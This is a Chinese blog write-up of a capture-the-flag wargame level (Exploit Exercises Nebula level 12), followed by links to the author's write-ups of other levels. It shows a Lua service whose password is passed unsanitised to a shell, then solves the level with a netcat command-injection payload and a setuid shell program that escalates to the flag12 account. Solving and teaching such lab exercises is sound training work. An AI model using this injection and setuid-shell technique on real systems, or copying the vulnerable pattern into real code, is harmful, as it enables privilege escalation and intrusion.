ExploitExercises_Nebula_Level12

最新推荐文章于 2016-12-30 16:10:39 发布
最新推荐文章于 2016-12-30 16:10:39 发布
阅读量464 收藏
点赞数
分类专栏: ExploitExercise
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hurricane_0x01/article/details/53941192
版权

程序源码为lua脚本:

local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local line, err = client:receive()
  if not err then
      print("trying " .. line) -- log from where ;\
      local h = hash(line)

      if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
          client:send("Better luck next time\n");
      else
          client:send("Congrats, your token is 413**CARRIER LOST**\n")
      end

  end

  client:close()
end
可以对password进行注入:

1. 在/tmp目录下创建shell.c:

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/bin/bash");
}
2. 参数注入: 

level12@nebula:/tmp$ nc localhost 50001
Password: 1; gcc -o /tmp/shell /tmp/shell.c; cp /tmp/shell /home/flag12; chmod +s /home/flag12/shell echo 1

3. 然后运行/home/flag12/shell即可: 

level12@nebula:/tmp$ cd /home/flag12
level12@nebula:/home/flag12$ ls -l
total 9
-rw-r--r-- 1 root   root    685 2011-11-20 21:22 flag12.lua
-rwsr-sr-x 1 flag12 flag12 7321 2016-12-29 19:54 shell
level12@nebula:/home/flag12$ date
Thu Dec 29 19:55:36 PST 2016
level12@nebula:/home/flag12$ ./shell 
flag12@nebula:/home/flag12$




小黑话不多
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
digital_nebula
09-02
digital_nebula
Nebula level12
无心插柳
05-13 5173
About There is a backdoor process listening on port 50001. To do this level, log in as the level12 account with the password level12 . Files for this level can be found in /home/flag12. 1local
ExploitExercises_Nebula_Level07
小黑话不多
12-28 1048
题目源码为一段perl脚本: #!/usr/bin/perl use CGI qw{param}; print "Content-type: text/html\n\n"; sub ping { $host = $_[0]; print("Ping results"); @output = `ping -c 3 $host 2>&1`; foreach $line (@
ExploitExercises_Nebula_Level08
小黑话不多
12-28 445
题目提供了一个capture.pcap文件: 可以看到password部分输入,其中包括几处0x7F,查询ascii表,该值对应删除操作。 还原删除过程,最终得到密码:bacjd00Rmate su - flag08尝试登陆,成功。
ExploitExercises_Nebula_Level05
小黑话不多
12-26 511
题目如下: Check the flag05 home directory. You are looking for weak directory permissions To do this level, log in as the level05 account with the password level05. Files for this level can be found i
ExploitExercises_Nebula_Level10
小黑话不多
12-30 603
题目源码: #include #include #include #include #include #include #include #include #include int main(int argc, char **argv) { char *file; char *host; if(argc < 3) { printf("%s file
ExploitExercises_Nebula_Level06
小黑话不多
12-26 417
题目如下: The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.
ExploitExercises_Nebula_Level03
小黑话不多
12-26 816
题目设置定时任务,定时执行/home/flag03/writable.sh脚本: #!/bin/sh for i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done 可以看到,该脚本去执行writable.d目录下的程序。 获取shell过程如下: 1.
ExploitExercises_Nebula_Level04
小黑话不多
12-26 629
题目余源码如下: #include #include #include #include #include #include int main(int argc, char **argv, char **envp) { char buf[1024]; int fd, rc; if(argc == 1) { printf("%s [file to read]
ExploitExercises_Nebula_Level14
小黑话不多
12-30 1017
/home/flag14/flag14是一个加密程序,输入加-e参数,该程序将对输入数据加密后输出到终端: level14@nebula:~$ /home/flag14/flag14 -e 123456 13579; 逆向加密算法: v12 = *MK_FP(__GS__, 20); v8 = 0; if ( argc <= 1 ) goto LABEL_17;
golden_nebula
09-02
golden_nebula
Pulsar_wind_nebula_Spectral_analysis
02-09
脉冲星云光谱分析从PWN G21.5 -0.9的发射中获得了一些结果数据 Obsid:10002014003基于纸数据清理
抽象精品ppt模板golden_nebula234
09-02
抽象精品ppt模板golden_nebula234
精品ppt模板PPT素材digital_nebula018
09-02
精品ppt模板PPT素材digital_nebula018
ExploitExercises_Nebula_Level01
小黑话不多
12-26 1375
题目源码如下: #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);
Exploit_Nubula_Level00
小黑话不多
12-25 1023
题目如下: This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking d
ExploitExercises_Nebula_Level13
小黑话不多
12-30 701
题目源码中省略了token的计算过程: #include #include #include #include #include #define FAKEUID 1000 int main(int argc, char **argv, char **envp) { int c; char token[256]; if(getuid() != FAKEUID) {
ExploitExercises_Nebula_Level09
小黑话不多
12-29 469
题目给出一段PHP代码: <?php function spam($email) { $email = preg_replace("/\./", " dot ", $email); $email = preg_replace("/@/", " AT ", $email); return $email; } function markup($filename, $use_me
table_name="ods_nebula_tb_customer" table_level_1="${table_name%%_*}"
最新发布
07-15
根据你提供的代码,变量 `table_name` 的值是 "ods_nebula_tb_customer",而变量 `table_level_1` 则是通过截取 `table_name` 中第一个下划线之前的部分来得到的。 具体来说,`${table_name%%_*}` 是一种字符串替换...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值